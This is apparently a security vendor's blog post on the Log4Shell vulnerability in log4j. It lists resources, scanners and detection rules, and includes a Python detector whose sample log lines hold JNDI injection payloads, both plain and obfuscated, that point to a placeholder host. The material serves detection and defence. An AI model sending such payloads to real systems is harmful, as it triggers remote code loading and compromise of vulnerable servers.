The Log4Shell vulnerability (CVE-2021-44228) in log4j is actively exploited in the wild and highly critical. This blog post lists some important web resources and the signatures that detect exploitation attempts.

Explanation of the Vulnerability

LunaSec was the first to report on the vulnerability.

Canary-based Vulnerability Detection

Use this method to detect vulnerable applications and services in your organisation.

Grep / ZGrep Detection Ideas

Different detection patterns and ideas for detecting exploitation attempts in log files using grep and zgrep.

Log4Shell Detector Python Script

A Python script that can be used to detect even the most obfuscated versions of the malicious payload.
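As an added example (not the linked script's code, nor Nextron's), this shows the kind of normalisation such a detector performs before matching: nested lower/upper/default-value lookups are resolved from the inside out so that an obfuscated lookup string reads like the plain form, and only then is the grep-style pattern applied. The log lines and hosts below are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup (nothing nested) and the plain JNDI form we look for.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)

def _resolve(match):
    """Resolve one innermost lookup that serves only to obfuscate."""
    body = match.group(1)
    head, sep, tail = body.partition(":")
    if head.lower() == "jndi":           # keep the lookup we want to detect
        return match.group(0)
    if sep and head.lower() == "lower":  # ${lower:J} -> j
        return tail.lower()
    if sep and head.lower() == "upper":  # ${upper:n} -> N
        return tail.upper()
    if ":-" in body:                     # ${anything:-default} -> default
        return body.rsplit(":-", 1)[1]
    return match.group(0)                # unknown lookup: leave untouched

def normalize_lookups(text, max_rounds=20):
    """URL-decode, then collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text

def find_jndi_lookup(line):
    """Return the normalised JNDI lookup in a log line, or None."""
    match = _JNDI.search(normalize_lookups(line))
    return match.group(0) if match else None

def scan_lines(lines):
    """(1-based line number, normalised lookup) for every matching line."""
    return [(n, hit) for n, line in enumerate(lines, 1)
            if (hit := find_jndi_lookup(line))]

# Constructed sample access-log lines; hosts are placeholders, not real IOCs.
SAMPLE_LOG = [
    '10.0.0.1 - - [10/Dec/2021:12:00:00 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.2 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 612 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.3 - - [10/Dec/2021:12:00:02 +0000] "GET /api HTTP/1.1" 200 612 "-" "${${lower:j}${upper:n}di:ldap://example.invalid/a}"',
    '10.0.0.4 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 200 612 "-" "%24%7B%24%7B::-j%7Dndi:rmi://example.invalid/a%7D"',
]
```

Run `scan_lines` over your own access logs to list the lines and the de-obfuscated lookup each contained; a plain grep for the literal string would miss the last two sample lines.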

List of Advisories by Vendors

Big collection of advisories and statements by different vendors that use Java and log4j.

List of Vulnerable Software with PoCs

Incomplete list of software products that have proven to be vulnerable.

Log4Shell Vulnerability Scanner (Local Files)

Scans the file system of application servers for vulnerable versions of the log4j module.

Fenrir Log4Shell Release

A bash-based IOC scanner that can be used on any Linux/Unix system to detect traces of the attack and vulnerable log4j versions.

Signatures Detecting Log4Shell Attacks

Check for matches with the following rules:

Exploitation

YARA

Sigma

Post-Exploitation

Look for matches with the following rules, which trigger on activity observed in the wild.

YARA

Sigma

ASGARD Users

It takes us a few days to release new rules. The rules that we wrote over the weekend may not be available on Monday, 13th of December. ASGARD users who want to use the signatures that are still in our QA process can activate the option for these signatures in “Settings > Advanced > Show Signature SigDev Option”.

After changing the setting, new scans show an additional option in the dropdown menu.

Please contact our support in case of any questions.

THOR Users

Users of our scanner THOR also need to use the signature version that is still in development to get the newest signatures that detect log4j exploitation.

Retrieve that signature pack with:

thor-util.exe update --sigdev
